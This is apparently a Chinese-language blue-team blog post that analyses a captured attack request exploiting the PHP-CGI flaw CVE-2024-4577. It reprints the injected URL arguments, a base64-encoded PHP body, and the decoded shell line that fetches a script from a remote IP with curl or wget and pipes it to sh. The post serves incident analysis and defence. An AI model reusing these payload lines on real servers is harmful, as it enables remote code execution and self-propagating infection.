WEB安全--蓝队日志--RCE数据包分析

一、分析数据包内容

攻击者通过URL请求+POST传参的方式试图绕过IPS测试RCE漏洞的利用

URL请求中的内容进行urlcode解码后是这样的:

复制代码
http://资产IP/hello.world?-d allow_url_include=1 -d auto_prepend_file=php://input
1. -d allow_url_include=1
  • 使用 PHP 的 -d 命令行参数,在执行时动态设置配置项
  • allow_url_include=1:启用从 URL 包含文件的功能,这通常在 php.ini 是禁用的。
  • 它允许 include()require() 加载远程地址,如 http://attacker.com/shell.txt
2. -d auto_prepend_file=php://input
  • 这个设置使 PHP 在解析主脚本之前,自动包含一个文件
  • 这里指定的文件是 php://input,也就是HTTP 请求体(POST data)中的原始输入流
  • 也就是说可以直接包含POST中的数据并执行

然后再结合POST传递的内容分析:

请求体中的内容是:

复制代码
<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzEwNC4yNDUuMjQwLjI4L3NoIHx8IHdnZXQgaHR0cDovL
zEwNC4yNDUuMjQwLjI4L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA=="));
echo(md5("Hello CVE-2024-4577")); ?>

其中base64字段解码后:

复制代码
<?php shell_exec( X=$(curl http://104.245.240.28/sh || wget http://104.245.240.28/sh -O-); 
echo "$X" | sh -s cve_2024_4577.selfrep);

echo(md5("Hello CVE-2024-4577")); ?>

这条命令的目的是利用远程代码执行漏洞(RCE)来从远程服务器下载一个脚本并执行它,而它特别指向了一个命名为 cve_2024_4577.selfrep 的 payload,表明攻击者试图利用 2024 年披露的某个 CVE(CVE-2024-4577)漏洞,进行进一步的自动传播或感染操作

二、判断攻击者的目的

1、通过GET参数-d开启allow_url_include=1和auto_prepend_file=php://input

其目的是执行POST传递的数据流

2、POST注入恶意PHP脚本,内容为:

使用shell_exec()执行shell命令

复制代码
X=$(curl http://104.245.240.28/sh || wget http://104.245.240.28/sh -O-); echo "$X" | sh -s cve_2024_4577.selfrep

通过curl或wget访问攻击者远程搭建的服务器中104.245.240.28中的sh文件

把内容赋值给X

将X的值通过管道符传递给靶机本地sh执行

-s cve_2024_4577.selfrep 表明传递一个参数给脚本,脚本内部可能会根据这个参数执行

3、然后通过echo(md5("Hello CVE-2024-4577")); 输出一个hash,用于回显检测是否成功执行。

相关推荐
网安INF1 小时前
CVE-2020-17519源码分析与漏洞复现(Flink 任意文件读取)
java·web安全·网络安全·flink·漏洞
lubiii_1 小时前
墨者学院-密码学实训隐写术第二题
web安全·网络安全·密码学
moongoblin2 小时前
行业赋能篇-2-能源行业安全运维升级
运维·安全·协作
Fortinet_CHINA2 小时前
引领AI安全新时代 Accelerate 2025北亚巡展·北京站成功举办
网络·安全
这儿有一堆花3 小时前
安全访问家中 Linux 服务器的远程方案 —— 专为单用户场景设计
linux·服务器·安全
上海云盾第一敬业销售6 小时前
高防IP可以防护什么攻击类型?企业网络安全的第一道防线
网络·tcp/ip·web安全
饮长安千年月7 小时前
JavaSec-SpringBoot框架
java·spring boot·后端·计算机网络·安全·web安全·网络安全
大咖分享课7 小时前
容器安全最佳实践:云原生环境下的零信任架构实施
安全·云原生·架构
淡水猫.8 小时前
ApacheSuperset CVE-2023-27524
安全·web安全
恰薯条的屑海鸥9 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第九期-Unsafe Fileupload模块)(yakit方式)
网络·学习·安全·web安全·渗透测试·csrf·网络安全学习